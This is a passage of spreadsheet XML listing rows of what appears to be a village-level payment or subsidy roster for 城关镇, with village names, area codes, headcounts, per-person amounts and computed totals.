      <c r="D237" s="14" t="s">
        <v>809</v>
      </c>
      <c r="E237" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F237" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G237" s="14">
        <v>2</v>
      </c>
      <c r="H237" s="14">
        <v>300</v>
      </c>
      <c r="I237" s="14">
        <f>H237*G237</f>
        <v>600</v>
      </c>
      <c r="J237" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K237" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="238" ht="23" customHeight="1" spans="1:11">
      <c r="A238" s="13" t="s">
        <v>810</v>
      </c>
      <c r="B238" s="14" t="str">
        <f>B237</f>
        <v>城关镇</v>
      </c>
      <c r="C238" s="14" t="str">
        <f>C237</f>
        <v>北外村</v>
      </c>
      <c r="D238" s="13" t="s">
        <v>811</v>
      </c>
      <c r="E238" s="13" t="s">
        <v>812</v>
      </c>
      <c r="F238" s="14" t="str">
        <f>F237</f>
        <v>4113210102</v>
      </c>
      <c r="G238" s="14"/>
      <c r="H238" s="14"/>
      <c r="I238" s="14"/>
      <c r="J238" s="14"/>
      <c r="K238" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="239" ht="23" customHeight="1" spans="1:11">
      <c r="A239" s="13" t="s">
        <v>813</v>
      </c>
      <c r="B239" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C239" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D239" s="14" t="s">
        <v>814</v>
      </c>
      <c r="E239" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F239" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G239" s="14">
        <v>1</v>
      </c>
      <c r="H239" s="14">
        <v>340</v>
      </c>
      <c r="I239" s="14">
        <f>H239*G239</f>
        <v>340</v>
      </c>
      <c r="J239" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K239" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="240" ht="23" customHeight="1" spans="1:11">
      <c r="A240" s="13" t="s">
        <v>815</v>
      </c>
      <c r="B240" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C240" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D240" s="14" t="s">
        <v>816</v>
      </c>
      <c r="E240" s="14" t="s">
        <v>817</v>
      </c>
      <c r="F240" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G240" s="14">
        <v>2</v>
      </c>
      <c r="H240" s="14">
        <v>300</v>
      </c>
      <c r="I240" s="14">
        <f>H240*G240</f>
        <v>600</v>
      </c>
      <c r="J240" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K240" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="241" ht="23" customHeight="1" spans="1:11">
      <c r="A241" s="13" t="s">
        <v>818</v>
      </c>
      <c r="B241" s="14" t="str">
        <f>B240</f>
        <v>城关镇</v>
      </c>
      <c r="C241" s="14" t="str">
        <f>C240</f>
        <v>中华村</v>
      </c>
      <c r="D241" s="13" t="s">
        <v>819</v>
      </c>
      <c r="E241" s="13" t="s">
        <v>820</v>
      </c>
      <c r="F241" s="14" t="str">
        <f>F240</f>
        <v>4113210108</v>
      </c>
      <c r="G241" s="14"/>
      <c r="H241" s="14"/>
      <c r="I241" s="14"/>
      <c r="J241" s="14"/>
      <c r="K241" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="242" ht="23" customHeight="1" spans="1:11">
      <c r="A242" s="13" t="s">
        <v>821</v>
      </c>
      <c r="B242" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C242" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D242" s="14" t="s">
        <v>822</v>
      </c>
      <c r="E242" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F242" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G242" s="14">
        <v>1</v>
      </c>
      <c r="H242" s="14">
        <v>340</v>
      </c>
      <c r="I242" s="14">
        <f>H242*G242</f>
        <v>340</v>
      </c>
      <c r="J242" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K242" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="243" ht="23" customHeight="1" spans="1:11">
      <c r="A243" s="13" t="s">
        <v>823</v>
      </c>
      <c r="B243" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C243" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D243" s="14" t="s">
        <v>824</v>
      </c>
      <c r="E243" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F243" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G243" s="14">
        <v>3</v>
      </c>
      <c r="H243" s="14">
        <v>295</v>
      </c>
      <c r="I243" s="14">
        <f>H243*G243</f>
        <v>885</v>
      </c>
      <c r="J243" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K243" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="244" ht="23" customHeight="1" spans="1:11">
      <c r="A244" s="13" t="s">
        <v>825</v>
      </c>
      <c r="B244" s="14" t="str">
        <f>B243</f>
        <v>城关镇</v>
      </c>
      <c r="C244" s="14" t="str">
        <f>C243</f>
        <v>中华村</v>
      </c>
      <c r="D244" s="13" t="s">
        <v>826</v>
      </c>
      <c r="E244" s="13" t="s">
        <v>827</v>
      </c>
      <c r="F244" s="14" t="str">
        <f>F243</f>
        <v>4113210108</v>
      </c>
      <c r="G244" s="14"/>
      <c r="H244" s="14"/>
      <c r="I244" s="14"/>
      <c r="J244" s="14"/>
      <c r="K244" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="245" ht="23" customHeight="1" spans="1:11">
      <c r="A245" s="13" t="s">
        <v>828</v>
      </c>
      <c r="B245" s="14" t="str">
        <f>B244</f>
        <v>城关镇</v>
      </c>
      <c r="C245" s="14" t="str">
        <f>C244</f>
        <v>中华村</v>
      </c>
      <c r="D245" s="15" t="s">
        <v>829</v>
      </c>
      <c r="E245" s="15" t="s">
        <v>607</v>
      </c>
      <c r="F245" s="14" t="str">
        <f>F244</f>
        <v>4113210108</v>
      </c>
      <c r="G245" s="14"/>
      <c r="H245" s="14"/>
      <c r="I245" s="14"/>
      <c r="J245" s="14"/>
      <c r="K245" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="246" ht="23" customHeight="1" spans="1:11">
      <c r="A246" s="13" t="s">
        <v>830</v>
      </c>
      <c r="B246" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C246" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D246" s="14" t="s">
        <v>831</v>
      </c>
      <c r="E246" s="14" t="s">
        <v>616</v>
      </c>
      <c r="F246" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G246" s="14">
        <v>1</v>
      </c>
      <c r="H246" s="14">
        <v>350</v>
      </c>
      <c r="I246" s="14">
        <f>H246*G246</f>
        <v>350</v>
      </c>
      <c r="J246" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K246" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="247" ht="23" customHeight="1" spans="1:11">
      <c r="A247" s="13" t="s">
        <v>832</v>
      </c>
      <c r="B247" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C247" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D247" s="14" t="s">
        <v>833</v>
      </c>
      <c r="E247" s="14" t="s">
        <v>834</v>
      </c>
      <c r="F247" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G247" s="14">
        <v>1</v>
      </c>
      <c r="H247" s="14">
        <v>340</v>
      </c>
      <c r="I247" s="14">
        <f>H247*G247</f>
        <v>340</v>
      </c>
      <c r="J247" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K247" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="248" ht="23" customHeight="1" spans="1:11">
      <c r="A248" s="13" t="s">
        <v>835</v>
      </c>
      <c r="B248" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C248" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D248" s="14" t="s">
        <v>836</v>
      </c>
      <c r="E248" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F248" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G248" s="14">
        <v>1</v>
      </c>
      <c r="H248" s="14">
        <v>340</v>
      </c>
      <c r="I248" s="14">
        <f>H248*G248</f>
        <v>340</v>
      </c>
      <c r="J248" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K248" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="249" ht="23" customHeight="1" spans="1:11">
      <c r="A249" s="13" t="s">
        <v>837</v>
      </c>
      <c r="B249" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C249" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D249" s="14" t="s">
        <v>838</v>
      </c>
      <c r="E249" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F249" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G249" s="14">
        <v>3</v>
      </c>
      <c r="H249" s="14">
        <v>265</v>
      </c>
      <c r="I249" s="14">
        <f>H249*G249</f>
        <v>795</v>
      </c>
      <c r="J249" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K249" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="250" ht="23" customHeight="1" spans="1:11">
      <c r="A250" s="13" t="s">
        <v>839</v>
      </c>
      <c r="B250" s="14" t="str">
        <f>B249</f>
        <v>城关镇</v>
      </c>
      <c r="C250" s="14" t="str">
        <f>C249</f>
        <v>北外村</v>
      </c>
      <c r="D250" s="13" t="s">
        <v>840</v>
      </c>
      <c r="E250" s="13" t="s">
        <v>841</v>
      </c>
      <c r="F250" s="14" t="str">
        <f>F249</f>
        <v>4113210102</v>
      </c>
      <c r="G250" s="14"/>
      <c r="H250" s="14"/>
      <c r="I250" s="14"/>
      <c r="J250" s="14"/>
      <c r="K250" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="251" ht="23" customHeight="1" spans="1:11">
      <c r="A251" s="13" t="s">
        <v>842</v>
      </c>
      <c r="B251" s="14" t="str">
        <f>B250</f>
        <v>城关镇</v>
      </c>
      <c r="C251" s="14" t="str">
        <f>C250</f>
        <v>北外村</v>
      </c>
      <c r="D251" s="13" t="s">
        <v>843</v>
      </c>
      <c r="E251" s="13" t="s">
        <v>844</v>
      </c>
      <c r="F251" s="14" t="str">
        <f>F250</f>
        <v>4113210102</v>
      </c>
      <c r="G251" s="14"/>
      <c r="H251" s="14"/>
      <c r="I251" s="14"/>
      <c r="J251" s="14"/>
      <c r="K251" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="252" ht="23" customHeight="1" spans="1:11">
      <c r="A252" s="13" t="s">
        <v>845</v>
      </c>
      <c r="B252" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C252" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D252" s="14" t="s">
        <v>846</v>
      </c>
      <c r="E252" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F252" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G252" s="14">
        <v>2</v>
      </c>
      <c r="H252" s="14">
        <v>300</v>
      </c>
      <c r="I252" s="14">
        <f>H252*G252</f>
        <v>600</v>
      </c>
      <c r="J252" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K252" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="253" ht="23" customHeight="1" spans="1:11">
      <c r="A253" s="13" t="s">
        <v>847</v>
      </c>
      <c r="B253" s="14" t="str">
        <f>B252</f>
        <v>城关镇</v>
      </c>
      <c r="C253" s="14" t="str">
        <f>C252</f>
        <v>中华村</v>
      </c>
      <c r="D253" s="13" t="s">
        <v>848</v>
      </c>
      <c r="E253" s="13" t="s">
        <v>502</v>
      </c>
      <c r="F253" s="14" t="str">
        <f>F252</f>
        <v>4113210108</v>
      </c>
      <c r="G253" s="14"/>
      <c r="H253" s="14"/>
      <c r="I253" s="14"/>
      <c r="J253" s="14"/>
      <c r="K253" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="254" ht="23" customHeight="1" spans="1:11">
      <c r="A254" s="13" t="s">
        <v>849</v>
      </c>
      <c r="B254" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C254" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D254" s="14" t="s">
        <v>850</v>
      </c>
      <c r="E254" s="14" t="s">
        <v>499</v>
      </c>
      <c r="F254" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G254" s="14">
        <v>1</v>
      </c>
      <c r="H254" s="14">
        <v>340</v>
      </c>
      <c r="I254" s="14">
        <f>H254*G254</f>
        <v>340</v>
      </c>
      <c r="J254" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K254" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="255" ht="23" customHeight="1" spans="1:11">
      <c r="A255" s="13" t="s">
        <v>851</v>
      </c>
      <c r="B255" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C255" s="14" t="s">
        <v>647</v>
      </c>
      <c r="D255" s="14" t="s">
        <v>852</v>
      </c>
      <c r="E255" s="14" t="s">
        <v>853</v>
      </c>
      <c r="F255" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G255" s="14">
        <v>2</v>
      </c>
      <c r="H255" s="14">
        <v>300</v>
      </c>
      <c r="I255" s="14">
        <f>H255*G255</f>
        <v>600</v>
      </c>
      <c r="J255" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K255" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="256" ht="23" customHeight="1" spans="1:11">
      <c r="A256" s="13" t="s">
        <v>854</v>
      </c>
      <c r="B256" s="14" t="str">
        <f>B255</f>
        <v>城关镇</v>
      </c>
      <c r="C256" s="14" t="str">
        <f>C255</f>
        <v>东北二组</v>
      </c>
      <c r="D256" s="13" t="s">
        <v>855</v>
      </c>
      <c r="E256" s="13" t="s">
        <v>856</v>
      </c>
      <c r="F256" s="14" t="str">
        <f>F255</f>
        <v>4113210103</v>
      </c>
      <c r="G256" s="14"/>
      <c r="H256" s="14"/>
      <c r="I256" s="14"/>
      <c r="J256" s="14"/>
      <c r="K256" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="257" ht="23" customHeight="1" spans="1:11">
      <c r="A257" s="13" t="s">
        <v>857</v>
      </c>
      <c r="B257" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C257" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D257" s="14" t="s">
        <v>858</v>
      </c>
      <c r="E257" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F257" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G257" s="14">
        <v>2</v>
      </c>
      <c r="H257" s="14">
        <v>300</v>
      </c>
      <c r="I257" s="14">
        <f>H257*G257</f>
        <v>600</v>
      </c>
      <c r="J257" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K257" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="258" ht="23" customHeight="1" spans="1:11">
      <c r="A258" s="13" t="s">
        <v>859</v>
      </c>
      <c r="B258" s="14" t="str">
        <f>B257</f>
        <v>城关镇</v>
      </c>
      <c r="C258" s="14" t="str">
        <f>C257</f>
        <v>东北六组</v>
      </c>
      <c r="D258" s="13" t="s">
        <v>860</v>
      </c>
      <c r="E258" s="13" t="s">
        <v>306</v>
      </c>
      <c r="F258" s="14" t="str">
        <f>F257</f>
        <v>4113210103</v>
      </c>
      <c r="G258" s="14"/>
      <c r="H258" s="14"/>
      <c r="I258" s="14"/>
      <c r="J258" s="14"/>
      <c r="K258" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="259" ht="23" customHeight="1" spans="1:11">
      <c r="A259" s="13" t="s">
        <v>861</v>
      </c>
      <c r="B259" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C259" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D259" s="14" t="s">
        <v>862</v>
      </c>
      <c r="E259" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F259" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G259" s="14">
        <v>1</v>
      </c>
      <c r="H259" s="14">
        <v>340</v>
      </c>
      <c r="I259" s="14">
        <f>H259*G259</f>
        <v>340</v>
      </c>
      <c r="J259" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K259" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="260" ht="23" customHeight="1" spans="1:11">
      <c r="A260" s="13" t="s">
        <v>863</v>
      </c>
      <c r="B260" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C260" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D260" s="14" t="s">
        <v>864</v>
      </c>
      <c r="E260" s="14" t="s">
        <v>456</v>
      </c>
      <c r="F260" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G260" s="14">
        <v>1</v>
      </c>
      <c r="H260" s="14">
        <v>340</v>
      </c>
      <c r="I260" s="14">
        <f>H260*G260</f>
        <v>340</v>
      </c>
      <c r="J260" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K260" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="261" ht="23" customHeight="1" spans="1:11">
      <c r="A261" s="13" t="s">
        <v>865</v>
      </c>
      <c r="B261" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C261" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D261" s="14" t="s">
        <v>866</v>
      </c>
      <c r="E261" s="14" t="s">
        <v>867</v>
      </c>
      <c r="F261" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G261" s="14">
        <v>2</v>
      </c>
      <c r="H261" s="14">
        <v>300</v>
      </c>
      <c r="I261" s="14">
        <f>H261*G261</f>
        <v>600</v>
      </c>
      <c r="J261" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K261" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="262" ht="23" customHeight="1" spans="1:11">
      <c r="A262" s="13" t="s">
        <v>868</v>
      </c>
      <c r="B262" s="14" t="str">
        <f>B261</f>
        <v>城关镇</v>
      </c>
      <c r="C262" s="14" t="str">
        <f>C261</f>
        <v>中华村</v>
      </c>
      <c r="D262" s="13" t="s">
        <v>869</v>
      </c>
      <c r="E262" s="13" t="s">
        <v>269</v>
      </c>
      <c r="F262" s="14" t="str">
        <f>F261</f>
        <v>4113210108</v>
      </c>
      <c r="G262" s="14"/>
      <c r="H262" s="14"/>
      <c r="I262" s="14"/>
      <c r="J262" s="14"/>
      <c r="K262" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="263" ht="23" customHeight="1" spans="1:11">
      <c r="A263" s="13" t="s">
        <v>870</v>
      </c>
      <c r="B263" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C263" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D263" s="14" t="s">
        <v>871</v>
      </c>
      <c r="E263" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F263" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G263" s="14">
        <v>1</v>
      </c>
      <c r="H263" s="14">
        <v>340</v>
      </c>
      <c r="I263" s="14">
        <f t="shared" ref="I263:I269" si="8">H263*G263</f>
        <v>340</v>
      </c>
      <c r="J263" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K263" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="264" ht="23" customHeight="1" spans="1:11">
      <c r="A264" s="13" t="s">
        <v>872</v>
      </c>
      <c r="B264" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C264" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D264" s="14" t="s">
        <v>873</v>
      </c>
      <c r="E264" s="14" t="s">
        <v>360</v>
      </c>
      <c r="F264" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G264" s="14">
        <v>1</v>
      </c>
      <c r="H264" s="14">
        <v>340</v>
      </c>
      <c r="I264" s="14">
        <f t="shared" si="8"/>
        <v>340</v>
      </c>
      <c r="J264" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K264" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="265" ht="23" customHeight="1" spans="1:11">
      <c r="A265" s="13" t="s">
        <v>874</v>
      </c>
      <c r="B265" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C265" s="14" t="s">
        <v>875</v>
      </c>
      <c r="D265" s="14" t="s">
        <v>876</v>
      </c>
      <c r="E265" s="14" t="s">
        <v>877</v>
      </c>
      <c r="F265" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G265" s="14">
        <v>1</v>
      </c>
      <c r="H265" s="14">
        <v>400</v>
      </c>
      <c r="I265" s="14">
        <f t="shared" si="8"/>
        <v>400</v>
      </c>
      <c r="J265" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K265" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="266" ht="23" customHeight="1" spans="1:11">
      <c r="A266" s="13" t="s">
        <v>878</v>
      </c>
      <c r="B266" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C266" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D266" s="14" t="s">
        <v>879</v>
      </c>
      <c r="E266" s="14" t="s">
        <v>880</v>
      </c>
      <c r="F266" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G266" s="14">
        <v>1</v>
      </c>
      <c r="H266" s="14">
        <v>340</v>
      </c>
      <c r="I266" s="14">
        <f t="shared" si="8"/>
        <v>340</v>
      </c>
      <c r="J266" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K266" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="267" ht="23" customHeight="1" spans="1:11">
      <c r="A267" s="13" t="s">
        <v>881</v>
      </c>
      <c r="B267" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C267" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D267" s="14" t="s">
        <v>882</v>
      </c>
      <c r="E267" s="14" t="s">
        <v>883</v>
      </c>
      <c r="F267" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G267" s="14">
        <v>1</v>
      </c>
      <c r="H267" s="14">
        <v>340</v>
      </c>
      <c r="I267" s="14">
        <f t="shared" si="8"/>
        <v>340</v>
      </c>
      <c r="J267" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K267" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="268" ht="23" customHeight="1" spans="1:11">
      <c r="A268" s="13" t="s">
        <v>884</v>
      </c>
      <c r="B268" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C268" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D268" s="14" t="s">
        <v>833</v>
      </c>
      <c r="E268" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F268" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G268" s="14">
        <v>1</v>
      </c>
      <c r="H268" s="14">
        <v>340</v>
      </c>
      <c r="I268" s="14">
        <f t="shared" si="8"/>
        <v>340</v>
      </c>
      <c r="J268" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K268" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="269" ht="23" customHeight="1" spans="1:11">
      <c r="A269" s="13" t="s">
        <v>885</v>
      </c>
      <c r="B269" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C269" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D269" s="14" t="s">
        <v>886</v>
      </c>
      <c r="E269" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F269" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G269" s="14">
        <v>2</v>
      </c>
      <c r="H269" s="14">
        <v>300</v>
      </c>
      <c r="I269" s="14">
        <f t="shared" si="8"/>
        <v>600</v>
      </c>
      <c r="J269" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K269" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="270" ht="23" customHeight="1" spans="1:11">
      <c r="A270" s="13" t="s">
        <v>887</v>
      </c>
      <c r="B270" s="14" t="str">
        <f>B269</f>
        <v>城关镇</v>
      </c>
      <c r="C270" s="14" t="str">
        <f>C269</f>
        <v>中华村</v>
      </c>
      <c r="D270" s="13" t="s">
        <v>888</v>
      </c>
      <c r="E270" s="13" t="s">
        <v>239</v>
      </c>
      <c r="F270" s="14" t="str">
        <f>F269</f>
        <v>4113210108</v>
      </c>
      <c r="G270" s="14"/>
      <c r="H270" s="14"/>
      <c r="I270" s="14"/>
      <c r="J270" s="14"/>
      <c r="K270" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="271" ht="23" customHeight="1" spans="1:11">
      <c r="A271" s="13" t="s">
        <v>889</v>
      </c>
      <c r="B271" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C271" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D271" s="14" t="s">
        <v>890</v>
      </c>
      <c r="E271" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F271" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G271" s="14">
        <v>1</v>
      </c>
      <c r="H271" s="14">
        <v>340</v>
      </c>
      <c r="I271" s="14">
        <f>H271*G271</f>
        <v>340</v>
      </c>
      <c r="J271" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K271" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="272" ht="23" customHeight="1" spans="1:11">
      <c r="A272" s="13" t="s">
        <v>891</v>
      </c>
      <c r="B272" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C272" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D272" s="14" t="s">
        <v>892</v>
      </c>
      <c r="E272" s="14" t="s">
        <v>893</v>
      </c>
      <c r="F272" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G272" s="14">
        <v>1</v>
      </c>
      <c r="H272" s="14">
        <v>340</v>
      </c>
      <c r="I272" s="14">
        <f>H272*G272</f>
        <v>340</v>
      </c>
      <c r="J272" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K272" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="273" ht="23" customHeight="1" spans="1:11">
      <c r="A273" s="13" t="s">
        <v>894</v>
      </c>
      <c r="B273" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C273" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D273" s="14" t="s">
        <v>895</v>
      </c>
      <c r="E273" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F273" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G273" s="14">
        <v>2</v>
      </c>
      <c r="H273" s="14">
        <v>300</v>
      </c>
      <c r="I273" s="14">
        <f>H273*G273</f>
        <v>600</v>
      </c>
      <c r="J273" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K273" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="274" ht="23" customHeight="1" spans="1:11">
      <c r="A274" s="13" t="s">
        <v>896</v>
      </c>
      <c r="B274" s="14" t="str">
        <f>B273</f>
        <v>城关镇</v>
      </c>
      <c r="C274" s="14" t="str">
        <f>C273</f>
        <v>中华村</v>
      </c>
      <c r="D274" s="13" t="s">
        <v>897</v>
      </c>
      <c r="E274" s="13" t="s">
        <v>405</v>
      </c>
      <c r="F274" s="14" t="str">
        <f>F273</f>
        <v>4113210108</v>
      </c>
      <c r="G274" s="14"/>
      <c r="H274" s="14"/>
      <c r="I274" s="14"/>
      <c r="J274" s="14"/>
      <c r="K274" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="275" ht="23" customHeight="1" spans="1:11">
      <c r="A275" s="13" t="s">
        <v>898</v>
      </c>
      <c r="B275" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C275" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D275" s="14" t="s">
        <v>899</v>
      </c>
      <c r="E275" s="14" t="s">
        <v>532</v>
      </c>
      <c r="F275" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G275" s="14">
        <v>1</v>
      </c>
      <c r="H275" s="14">
        <v>340</v>
      </c>
      <c r="I275" s="14">
        <f t="shared" ref="I275:I280" si="9">H275*G275</f>
        <v>340</v>
      </c>
      <c r="J275" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K275" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="276" ht="23" customHeight="1" spans="1:11">
      <c r="A276" s="13" t="s">
        <v>900</v>
      </c>
      <c r="B276" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C276" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D276" s="14" t="s">
        <v>901</v>
      </c>
      <c r="E276" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F276" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G276" s="14">
        <v>1</v>
      </c>
      <c r="H276" s="14">
        <v>340</v>
      </c>
      <c r="I276" s="14">
        <f t="shared" si="9"/>
        <v>340</v>
      </c>
      <c r="J276" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K276" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="277" ht="23" customHeight="1" spans="1:11">
      <c r="A277" s="13" t="s">
        <v>902</v>
      </c>
      <c r="B277" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C277" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D277" s="14" t="s">
        <v>903</v>
      </c>
      <c r="E277" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F277" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G277" s="14">
        <v>1</v>
      </c>
      <c r="H277" s="14">
        <v>340</v>
      </c>
      <c r="I277" s="14">
        <f t="shared" si="9"/>
        <v>340</v>
      </c>
      <c r="J277" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K277" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="278" ht="23" customHeight="1" spans="1:11">
      <c r="A278" s="13" t="s">
        <v>904</v>
      </c>
